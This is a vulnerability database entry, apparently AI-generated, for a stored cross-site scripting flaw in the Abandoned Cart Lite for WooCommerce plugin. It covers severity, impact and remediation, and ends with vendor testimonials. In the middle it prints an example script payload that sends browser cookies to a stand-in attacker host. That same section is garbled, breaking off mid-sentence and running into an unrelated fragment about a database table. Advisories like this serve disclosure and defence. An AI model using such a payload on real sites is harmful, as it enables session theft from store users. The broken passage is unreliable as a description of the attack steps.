
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-65557 is a stored Cross-Site Scripting (XSS) vulnerability affecting the Abandoned Cart Lite for WooCommerce WordPress plugin in versions 6.8.0 and earlier, developed by Tyche Softwares. The vulnerability allows a shop manager (a high-privileged user) to inject malicious scripts that execute in the browsers of other users viewing affected pages. It was published on July 27, 2026, with a patch advisory issued the same day. The vulnerability carries a CVSS v3.1 base score of 5.9 (Medium), assigned by Patchstack (GitHub Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), indicating that user-controllable input is not properly sanitized or escaped before being rendered in web pages served to other users. The attack vector is network-based, requires high privileges (shop manager role), and necessitates user interaction (a victim must view the affected page), with a changed scope indicating the impact crosses security boundaries from the plugin to the broader browser context. The specific input field or parameter susceptible to injection has not been publicly detailed in available sources (GitHub Advisory, Feedly).
A malicious shop manager can inject persistent JavaScript payloads into the WooCommerce store that execute in the browsers of other authenticated users (e.g., administrators or customers) who view the affected pages. This can result in session token theft, unauthorized account actions, content modification, or redirection of users to malicious external sites. The confidentiality, integrity, and availability impacts are each rated Low, reflecting partial but meaningful exposure (GitHub Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable field and save the configuration.wp_options table) containing script tags or encoded JavaScript.Site administrators should update the Abandoned Cart Lite for WooCommerce plugin to a version newer than 6.8.0, as a patch has been made available per the GitHub Advisory GHSA-wf3g-p4jm-gx88. As interim measures, restrict shop manager role assignments to only fully trusted users, implement Content Security Policy (CSP) headers to limit script execution contexts, and monitor administrator actions for suspicious activity. No specific workaround short of upgrading has been documented (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."